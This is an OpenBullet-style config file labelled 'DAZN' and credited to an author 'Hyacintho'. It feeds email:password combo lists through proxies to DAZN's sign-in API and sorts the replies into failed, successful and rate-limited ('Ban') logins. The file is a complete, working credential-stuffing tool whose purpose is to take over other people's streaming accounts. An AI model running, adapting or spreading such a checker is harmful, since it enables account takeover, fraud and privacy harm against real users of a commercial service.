[SETTINGS]
{
  "Name": "DAZN",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2019-07-24T17:23:31.3588366+02:00",
  "AdditionalInfo": "",
  "Author": "Hyacintho",
  "Version": "1.3.5 [Anomaly]",
  "LoliSave": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Transparent": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST OPTIONS "https://isl-eu.dazn.com/misl/eu/v5/SignIn" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36 OPR/62.0.3331.72" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "origin: https://www.dazn.com" 
  HEADER "referer: https://www.dazn.com/de-DE/account/signin" 

#Login REQUEST POST "https://isl-eu.dazn.com/misl/eu/v5/SignIn" 
  CONTENT "{\"Email\":\"<USER>\",\"Password\":\"<PASS>\",\"DeviceId\":\"0049A8939B\",\"Platform\":\"web\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "origin: https://www.dazn.com" 
  HEADER "referer: https://www.dazn.com/de-DE/account/signin" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36 OPR/62.0.3331.72" 

#KEY_CHECK_Login KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "{\"odata.error\":{\"code\":10049,\"message\":{\"lang\":\"en-US\",\"value\":\"InvalidPassword\"}}}" 
  KEYCHAIN Success OR 
    KEY "{\"Result\":\"SignedIn" 
  KEYCHAIN Ban OR 
    KEY "Request limiting policy has been breached" 

!REQUEST GET "https://my.dazn.com/myaccount" 
!  
!  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
!  HEADER "Pragma: no-cache" 
!  HEADER "Accept: */*" 

!KEYCHECK 

